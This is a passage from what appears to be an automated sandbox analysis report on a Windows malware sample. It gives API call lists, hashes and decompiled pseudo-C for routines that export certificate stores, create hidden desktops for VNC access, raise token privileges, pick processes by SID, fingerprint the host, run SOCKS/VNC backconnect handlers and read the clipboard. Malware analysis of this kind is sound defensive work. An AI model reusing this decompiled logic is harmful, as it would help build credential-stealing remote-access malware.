    • CreateProcessAsUserW.ADVAPI32(?,00000000,00410BFC,00000000,00000000,00000000,00410BFC,00410BFC,00000000,?,?,?,00000000,00000044), ref: 004136CD
    • CloseHandle.KERNEL32(?), ref: 004136E0
    • CloseHandle.KERNEL32(?), ref: 004136E5
    • FreeLibrary.KERNEL32(?), ref: 004136FC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: e1adfb6a43a5139a5b53241b4213f41724ec8b669e3c9fc05fb9d20d4c27fc41
    • Instruction ID: 9d1078056966c1d07337da42f794009eddb96c37953e8b11179e925ec30f906a
    • Opcode Fuzzy Hash: e1adfb6a43a5139a5b53241b4213f41724ec8b669e3c9fc05fb9d20d4c27fc41
    • Instruction Fuzzy Hash: F82127B2D0021DBBDF119FA5DC849EEBBBCEB08345F10847AE505F6260D6389E44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004108EC(void* __ecx, void* __eflags, WCHAR* _a4) {
    				char _v5;
    				struct HWINSTA__* _v12;
    				struct HWINSTA__* _v16;
    				char _v32;
    				char _v48;
    				void* __esi;
    				struct HWINSTA__* _t23;
    				WCHAR* _t28;
    				int _t35;
    				struct HWINSTA__* _t41;
    				void* _t43;
    				WCHAR* _t45;
    				struct HDESK__* _t46;
    
    				_t43 = __ecx;
    				_t45 =  &_v32;
    				_v5 = 0;
    				E00419897(0xcc, _t45);
    				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
    				_v12 = _t23;
    				if(_t23 != 0) {
    					L2:
    					_v16 = GetProcessWindowStation();
    					if(E004108C4(_t50, _v12) == 0) {
    						L13:
    						CloseWindowStation(_v12);
    						L14:
    						return _v5;
    					}
    					_t28 = _a4;
    					_a4 = _t28;
    					if(_t28 == 0) {
    						_t37 =  &_v48;
    						_a4 =  &_v48;
    						E00419897(0xcd, _t37);
    					}
    					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
    					if(_t46 != 0) {
    						L7:
    						if(E0041087F(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
    							L9:
    							_v5 = 1;
    							L10:
    							CloseDesktop(_t46);
    							if(_v5 != 0) {
    								goto L13;
    							}
    							goto L11;
    						}
    						_t35 = SetThreadDesktop(_t46);
    						_v5 = 0;
    						if(_t35 == 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
    						_t54 = _t46;
    						if(_t46 == 0) {
    							L11:
    							_t58 = _v16;
    							if(_v16 != 0) {
    								E004108C4(_t58, _v16);
    							}
    							goto L13;
    						}
    						goto L7;
    					}
    				}
    				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
    				_v12 = _t41;
    				_t50 = _t41;
    				if(_t41 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}
















    APIs
    • OpenWindowStationW.USER32(?,00000000,10000000), ref: 00410911
    • CreateWindowStationW.USER32 ref: 00410924
    • GetProcessWindowStation.USER32 ref: 00410935
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00410970
    • CreateDesktopW.USER32 ref: 00410984
    • GetCurrentThreadId.KERNEL32 ref: 00410990
    • GetThreadDesktop.USER32(00000000), ref: 00410997
    • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 004109A9
    • CloseDesktop.USER32(00000000,00000000,00000000), ref: 004109BB
    • CloseWindowStation.USER32(?,?), ref: 004109D6
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID:
    • API String ID: 2917431391-0
    • Opcode ID: d1ef42d8897c7f21b344082d8ad81f262cfed197469cc207eb56ad9ce1beea56
    • Instruction ID: 2b993e89a5c5570a505465c8290035d04d5b826f6b14cab2b59e762501ee87c4
    • Opcode Fuzzy Hash: d1ef42d8897c7f21b344082d8ad81f262cfed197469cc207eb56ad9ce1beea56
    • Instruction Fuzzy Hash: 95217FB5800248BFEB106FB59C98ADF7F78DB09345F00807AF804B3221D6788DC58BA8
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00401638), ref: 004053FA
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00405416
    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00405422
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00405461
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00405491
    • CharLowerW.USER32 ref: 004054AF
    • GetSystemTime.KERNEL32(?), ref: 004054BA
    • CertCloseStore.CRYPT32(?,00000000), ref: 00405543
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: 3cf8494495d2f0484629289c92d486b48812d15a4210bb23f812a3e8d39d4dd6
    • Instruction ID: a4d880268f85837dbc9e12c7aa458864c68fb0b4f3fd3437969bba756a20544a
    • Opcode Fuzzy Hash: 3cf8494495d2f0484629289c92d486b48812d15a4210bb23f812a3e8d39d4dd6
    • Instruction Fuzzy Hash: 0941A771108341ABD710AF65DD41AAFBBDDEB88304F40093FB988F31A0D634DD458B66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040647F() {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				long _v580;
    				void* _v588;
    				void* __esi;
    				void* _t42;
    				struct tagPROCESSENTRY32W* _t45;
    				signed int _t47;
    				void* _t48;
    				long _t65;
    				int _t71;
    				void** _t72;
    				void* _t73;
    
    				_t71 = 0;
    				_v5 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				while(1) {
    					_t42 = CreateToolhelp32Snapshot(2, _t71);
    					_v20 = _t42;
    					_v24 = _t71;
    					if(_t42 == 0xffffffff) {
    						break;
    					} else {
    						_t45 =  &_v588;
    						_v588 = 0x22c;
    						Process32FirstW(_v20, _t45);
    					}
    					while(_t45 != 0) {
    						_t65 = _v580;
    						if(_t65 <= _t71 || _t65 ==  *0x423dd0) {
    							L20:
    							_t45 = Process32NextW(_v20,  &_v588);
    							continue;
    						} else {
    							_t47 = 0;
    							if(_v12 <= _t71) {
    								L8:
    								_t48 = E0041C98A(_t65, _t70, _t65);
    								_v28 = _t48;
    								if(_t48 != _t71) {
    									_t73 = OpenProcess(0x400, _t71, _v580);
    									if(_t73 != _t71) {
    										_t72 = E00413315(_t65, _t73,  &_v32);
    										CloseHandle(_t73);
    										if(_t72 != 0) {
    											if(_v32 ==  *0x423b70 && GetLengthSid( *_t72) ==  *0x423b68 && E00411D6F( *((intOrPtr*)( *0x423b64)),  *_t72, _t56) == 0 && E00411C89(4 + _v12 * 4,  &_v16) != 0) {
    												_t70 = _v12;
    												_v12 = _v12 + 1;
    												_v24 = _v24 + 1;
    												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
    												if(E004063F6(_v16, _v580, _v28) != 0) {
    													_v5 = 1;
    												}
    											}
    											E00411CFE(_t72);
    										}
    										_t71 = 0;
    									}
    									CloseHandle(_v28);
    								}
    								goto L20;
    							} else {
    								goto L6;
    							}
    							while(1) {
    								L6:
    								_t70 = _v16;
    								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
    									goto L20;
    								}
    								_t47 = _t47 + 1;
    								if(_t47 < _v12) {
    									continue;
    								}
    								goto L8;
    							}
    							goto L20;
    						}
    					}
    					CloseHandle(_v20);
    					if(_v24 != _t71) {
    						continue;
    					}
    					break;
    				}
    				E00411CFE(_v16);
    				return _v5;
    			}





















    APIs
    • CreateToolhelp32Snapshot.KERNEL32 ref: 004064A0
    • Process32FirstW.KERNEL32(?,?), ref: 004064C9
    • OpenProcess.KERNEL32(00000400,00000000,?,?,?,73BCF560,00000000), ref: 00406524
    • CloseHandle.KERNEL32(00000000,00000000,?,?,73BCF560,00000000), ref: 00406541
    • GetLengthSid.ADVAPI32(00000000,?,73BCF560,00000000), ref: 00406554
    • CloseHandle.KERNEL32(?,?,73BCF560,00000000), ref: 004065C1
    • Process32NextW.KERNEL32(?,0000022C), ref: 004065CD
    • CloseHandle.KERNEL32(?,?,73BCF560,00000000), ref: 004065DE
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
    • String ID:
    • API String ID: 1981844004-0
    • Opcode ID: 266d705b7aa8b4249bb167674cd486ed258a4251f03e59072eee35543a84a0c2
    • Instruction ID: 57c7ff41533b20b63eacd6e89b5397b2eb780bd5c1eafbaca6970c36e374a01e
    • Opcode Fuzzy Hash: 266d705b7aa8b4249bb167674cd486ed258a4251f03e59072eee35543a84a0c2
    • Instruction Fuzzy Hash: D9417E30900119EFCF21DFA4DD849EEBBB5EF45304F1100AAE516B32A5DB399A95CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00417437(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				intOrPtr _v1120;
    				intOrPtr _v1124;
    				void* _v1128;
    				int _t51;
    				signed int _t60;
    				long _t68;
    				signed char _t71;
    				signed int _t83;
    
    				_v1120 = __edx;
    				_v1124 = __ecx;
    				_t51 = E00417593("*",  &_v524, __ecx);
    				if(_t51 == 0) {
    					L25:
    					return _t51;
    				}
    				_t51 = FindFirstFileW( &_v524,  &_v1116);
    				_v1128 = _t51;
    				if(_t51 != 0xffffffff) {
    					_t71 = _a8;
    					while(1) {
    						_t83 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(E00417193( &(_v1116.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v1128,  &_v1116) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t60 = _v1116.dwFileAttributes & 0x00000010;
    						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
    							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t83) {
    								L17:
    								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00417593( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
    									_t103 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									E00417437( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
    								_t83 = _t83 + 1;
    								if(_t83 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t68 = _a12(_a16);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					_t51 = FindClose(_v1128);
    				}
    			}













    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
    • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
    • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00417514
    • Sleep.KERNEL32(00000000,?,?), ref: 00417544
    • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
    • FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
    • String ID:
    • API String ID: 2348139788-0
    • Opcode ID: bf3ad005bc328733986c04015d1054695fc310f33c329604b2563d4772e89571
    • Instruction ID: 4c0d70ad95ed53f30eda166063541bcf04ba4e17a4f0c29d14b8b1fb85d9b75d
    • Opcode Fuzzy Hash: bf3ad005bc328733986c04015d1054695fc310f33c329604b2563d4772e89571
    • Instruction Fuzzy Hash: 7641827100820AABCF21DF50CD44ADF7BB6FF44394F00892AF99492661D739C995CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004133CA(WCHAR* _a4) {
    				void* _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t23;
    
    				_t23 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
    						_t23 = 1;
    					}
    					CloseHandle(_v12);
    					return _t23;
    				} else {
    					return 0;
    				}
    			}







    APIs
    • GetCurrentThread.KERNEL32 ref: 004133DA
    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
    • OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3
    • LookupPrivilegeValueW.ADVAPI32(00000000,00410CA8,?), ref: 00413417
    • AdjustTokenPrivileges.ADVAPI32(00410CA8,00000000,00000001,00000000,00000000,00000000), ref: 0041342C
    • GetLastError.KERNEL32 ref: 00413436
    • CloseHandle.KERNEL32(00410CA8), ref: 00413445
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: eb187dacaacafc8ad968d47516990ea2ef505364459f9dcf90fad5767cd0e4a6
    • Instruction ID: 86993c23503910aa688197fae5bce8d39ad58bf23df9299211a48af639016522
    • Opcode Fuzzy Hash: eb187dacaacafc8ad968d47516990ea2ef505364459f9dcf90fad5767cd0e4a6
    • Instruction Fuzzy Hash: 25014CB1600209BFEB119FA0DD89EEF7BACEB04749F000076F501E1161E7398A849A69
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(004175DA,00000000,00000000,00000001,F0000040,00000000,004175DA,?,00000030,?,?,?,00417AF3,?), ref: 00412FBC
    • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00417AF3,?), ref: 00412FD4
    • CryptHashData.ADVAPI32(?,00000010), ref: 00412FF0
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00413008
    • CryptDestroyHash.ADVAPI32(?), ref: 0041301F
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00417AF3,?), ref: 00413029
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 8c7b2e9c901c54fc573a1bdd9e64640e0d4f400bd6ae57e75fab373a6e69a197
    • Instruction ID: 3251579ac6a8d73fdc59e4810e561a704a85631c07bdb006a5ff6cc83c16105e
    • Opcode Fuzzy Hash: 8c7b2e9c901c54fc573a1bdd9e64640e0d4f400bd6ae57e75fab373a6e69a197
    • Instruction Fuzzy Hash: 2411127180024CBFEF119F90CD88EEEBF7DEB08381F008465F651A11A5D3368E94AB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E00407242(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
    				char _v5;
    				signed int _v12;
    				char _v20;
    				char _v64;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __ebx;
    				void* __esi;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed short _t71;
    				signed short _t75;
    				void* _t92;
    				void* _t95;
    				void* _t97;
    				signed short _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t109;
    				signed int _t111;
    				char* _t112;
    				void* _t113;
    
    				_t109 = __edx;
    				_t106 = __ecx;
    				_t111 = _a4;
    				_t114 =  *_t111;
    				_t99 = 1;
    				_v5 = 0;
    				if( *_t111 == 0) {
    					_t97 = E004175EF(_t114);
    					 *_t111 = _t97;
    					if(_t97 == 0) {
    						return 0;
    					}
    					_v5 = 1;
    				}
    				__eflags = _a8 & 0x00000001;
    				if(__eflags == 0) {
    					L9:
    					__eflags = _a8 & 0x00000002;
    					if((_a8 & 0x00000002) != 0) {
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x2713);
    						_t105 = 4;
    						_v12 = 0x1030809;
    						_t99 = E00417603(_t111, _t105);
    					}
    					L11:
    					__eflags = _a8 & 0x00000004;
    					if((_a8 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t99;
    						if(_t99 == 0) {
    							L32:
    							__eflags = _v5 - 1;
    							if(_v5 == 1) {
    								E00411CFE( *_t111);
    								 *_t111 =  *_t111 & 0x00000000;
    								__eflags =  *_t111;
    							}
    							L34:
    							return _t99;
    						}
    						__eflags = _a8 & 0x00000008;
    						if((_a8 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							}
    							__eflags = _a8 & 0x00000010;
    							if((_a8 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t99;
    								if(_t99 == 0) {
    									goto L32;
    								}
    								__eflags = _a8 & 0x00000020;
    								if((_a8 & 0x00000020) != 0) {
    									E0040718E(_t106, _t111, 2);
    									E0040718E(_t106, _t111, 0x17);
    								}
    								goto L34;
    							}
    							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_a4 = _t62;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								__eflags = 0;
    								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
    								_t106 =  &_v588;
    								_t99 = E004176B0(_t62,  &_v588, _t109, 0, _t111, 0x271e);
    							}
    							_a4 = 0x104;
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							} else {
    								_t64 =  &_v588;
    								__imp__GetUserNameExW(2, _t64,  &_a4);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									_t65 = _a4;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = 0;
    										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
    										_t106 =  &_v588;
    										_t99 = E004176B0(_t65,  &_v588, _t109, 0, _t111, 0x271f);
    									}
    								}
    								goto L28;
    							}
    						}
    						_t112 =  &_v20;
    						E0041D6F3(_t112);
    						_push(_t112);
    						_push(0x20000);
    						_push(0x271c);
    						_t100 = 6;
    						_t71 = E00417603(_a4, _t100);
    						_t99 = _t71;
    						__eflags = _t99;
    						if(_t99 == 0) {
    							_t111 = _a4;
    							goto L32;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v12 = _t71 & 0x0000ffff;
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x271d);
    						_t101 = 2;
    						_t75 = E00417603(_a4, _t101);
    						_t111 = _a4;
    						_t99 = _t75;
    						goto L20;
    					}
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00411E00();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x2719);
    					_t102 = 4;
    					_t99 = E00417603(_t111, _t102);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00411E28();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271b);
    					_t103 = 4;
    					_t99 = E00417603(_t111, _t103);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = GetTickCount();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271a);
    					_t104 = 4;
    					_t99 = E00417603(_t111, _t104);
    					goto L16;
    				}
    				_t92 = E0041CCFF(_t106,  &_v556);
    				_t106 =  &_v552;
    				_t99 = E004176B0(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				_t95 = E0041CE5D( &_v552,  &_v64);
    				__eflags = _v64;
    				if(__eflags != 0) {
    					_t106 =  &_v64;
    					_t99 = E004176B0(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
    				}
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}































    APIs
    • GetTickCount.KERNEL32 ref: 00407341
    • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,?,?,00000000), ref: 00407394
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,00000000), ref: 004073D6
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00407418
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: 366d9ba63433488946bb1f2e3a0bc14662b945b2c4082d558aa209266f5e9f33
    • Instruction ID: 0433f83de7c9e87faa1f5151ceec0d177264c4d1dab00c7caf895b980bf3037f
    • Opcode Fuzzy Hash: 366d9ba63433488946bb1f2e3a0bc14662b945b2c4082d558aa209266f5e9f33
    • Instruction Fuzzy Hash: 8851D731E8824879D7219F65D849FDE7BA89F02314F04406AFE44BF3D2DB789984CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00419084(void* __ecx, CHAR** _a4, signed int _a7) {
    				signed int _v6;
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				short _v30;
    				intOrPtr _v36;
    				char _v44;
    				char _v304;
    				char _v788;
    				char _v792;
    				void* __edi;
    				void* __esi;
    				int _t68;
    				signed short _t70;
    				signed int _t80;
    				void* _t95;
    				signed int _t99;
    				void* _t102;
    				signed int _t108;
    				void* _t112;
    				CHAR** _t121;
    				signed int _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t138;
    				signed int _t139;
    				void* _t141;
    
    				_t123 = __ecx;
    				E00411DB1( &_v304,  &_v304, 0, 0x104);
    				_t121 = _a4;
    				if(lstrcmpiA( *_t121, "socks") != 0) {
    					_t68 = lstrcmpiA( *_t121, "vnc");
    					__eflags = _t68;
    					if(_t68 != 0) {
    						_t70 = E0041237D( *_t121, _t123, 0);
    						_t6 = _t70 - 1; // -1
    						_t123 = _t6;
    						__eflags = _t6 - 0xfffd;
    						if(_t6 > 0xfffd) {
    							L32:
    							E00415E03( &_v304);
    							_a7 = 0;
    							if(_v304 <= 0) {
    								L34:
    								E00411CFE( *_t121);
    								E00411CFE(_t121[1]);
    								E00411CFE(_t121[2]);
    								E004154D1(_t121[3]);
    								E00411CFE(_t121);
    								return 0;
    							} else {
    								goto L33;
    							}
    							do {
    								L33:
    								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
    								_a7 = _a7 + 1;
    							} while (_a7 < _v304);
    							goto L34;
    						}
    						_t80 = _t70 & 0x0000ffff;
    						_v24 = _t80;
    						__eflags = _t80;
    						if(_t80 == 0) {
    							goto L32;
    						}
    						L6:
    						_t130 = E00414D87(E0041237D(_t121[2], _t123, 0), _t123, _t121[1]);
    						_v16 = _t130;
    						if(_t130 == 0xffffffff) {
    							goto L32;
    						}
    						E004150F9(_t123, _t130);
    						E004150B7(_t130);
    						_t89 = E00412B55(E0041CCFF(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
    						_t144 = _t89;
    						if(_t89 == 0) {
    							L31:
    							E004150A1(_t89, _t130);
    							goto L32;
    						}
    						_v9 = E004183A6( &_v788, _v36, _t144, _t130, 1, _v44);
    						_t89 = E00412B43( &_v44);
    						if(_v9 == 0) {
    							goto L31;
    						}
    						_t89 = E00414FAE(0,  &_v16, 0, 0);
    						_t130 = _v16;
    						if(_t89 != _t130) {
    							goto L31;
    						}
    						while(1) {
    							_push(0x7530);
    							_push( &_v8);
    							_t95 = 4;
    							if(E00414CB1(_t95, _t130) == 0 || _v8 <= 4) {
    								break;
    							}
    							_t138 = E00411CCE(_v8 & 0x0000ffff);
    							_push(0x7530);
    							if(_t138 == 0) {
    								_t127 = _v8 & 0x0000ffff;
    								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
    								L29:
    								_push(_t99);
    								_push(_t130);
    								_t89 = E00414CF9(_t127);
    								break;
    							}
    							_push(_t138);
    							_t127 = _t130;
    							_t102 = E00414CB1((_v8 & 0x0000ffff) - 4, _t130);
    							_push(_t138);
    							if(_t102 == 0) {
    								L35:
    								_t89 = E00411CFE();
    								break;
    							}
    							_v30 = _v6;
    							_v28 =  *_t138;
    							E00411CFE();
    							if(_v6 != 0) {
    								_t139 = E00411CCE(_v6 & 0x0000ffff);
    								_t99 = _v6 & 0x0000ffff;
    								_push(0x7530);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									goto L29;
    								}
    								_push(_t139);
    								_t127 = _t130;
    								_t108 = E00414CB1(_t99, _t130);
    								__eflags = _t108;
    								if(_t108 == 0) {
    									_push(_t139);
    									goto L35;
    								}
    								_v20 = _t139;
    								L20:
    								if(_v28 == 2 && _v30 == 4) {
    									_t112 = 0xc;
    									_t131 = E00411CCE(_t112);
    									if(_t131 != 0) {
    										 *_t131 = _a4;
    										 *((intOrPtr*)(_t131 + 4)) = _v24;
    										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
    										if(E00415DBE( &_v304, 0x20000, E00418DFB, _t131) == 0) {
    											E00411CFE(_t131);
    										}
    									}
    									E00415D6C(_t127,  &_v304);
    								}
    								E00411CFE(_v20);
    								_t89 = E00414FAE(0,  &_v16, 0, 0);
    								_t130 = _v16;
    								if(_t89 == _t130) {
    									continue;
    								} else {
    									break;
    								}
    							}
    							_v20 = _v20 & 0x00000000;
    							goto L20;
    						}
    						_t121 = _a4;
    						goto L31;
    					}
    					_v24 = 0xfffffffe;
    					goto L6;
    				}
    				_v24 = _v24 | 0xffffffff;
    				goto L6;
    			}
































    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004190B3
    • lstrcmpiA.KERNEL32(?,vnc), ref: 004190C6
    • CloseHandle.KERNEL32(?), ref: 004192E3
      • Part of subcall function 00415DBE: SetLastError.KERNEL32(0000009B,0041CFF0,00000000,00419A3E,00000000,00423A58,00000000,00000104,73BCF560,00000000), ref: 00415DC8
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
    • String ID: socks$vnc
    • API String ID: 3305036421-270151703
    • Opcode ID: 749aa6dfb44f3ea0b50b511457200b55f3952e562c7edc096cfd30fe8b7b6423
    • Instruction ID: 161428527012e6c9853b4de102439a08cb99e478cb02ac1ae5a3ff9e533e6a83
    • Opcode Fuzzy Hash: 749aa6dfb44f3ea0b50b511457200b55f3952e562c7edc096cfd30fe8b7b6423
    • Instruction Fuzzy Hash: 2A71F231900119BACF10AFA1C851BEE7BB5AF49714F14449BF945B7291DB3C8EC1CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041047C(void* _a4) {
    				signed int _t11;
    				void* _t21;
    				void* _t23;
    				void* _t24;
    				int _t25;
    
    				_t25 = _a4;
    				_t23 = GetClipboardData(_t25);
    				_a4 = _t23;
    				if(E0041CB59() == 0) {
    					return _t23;
    				}
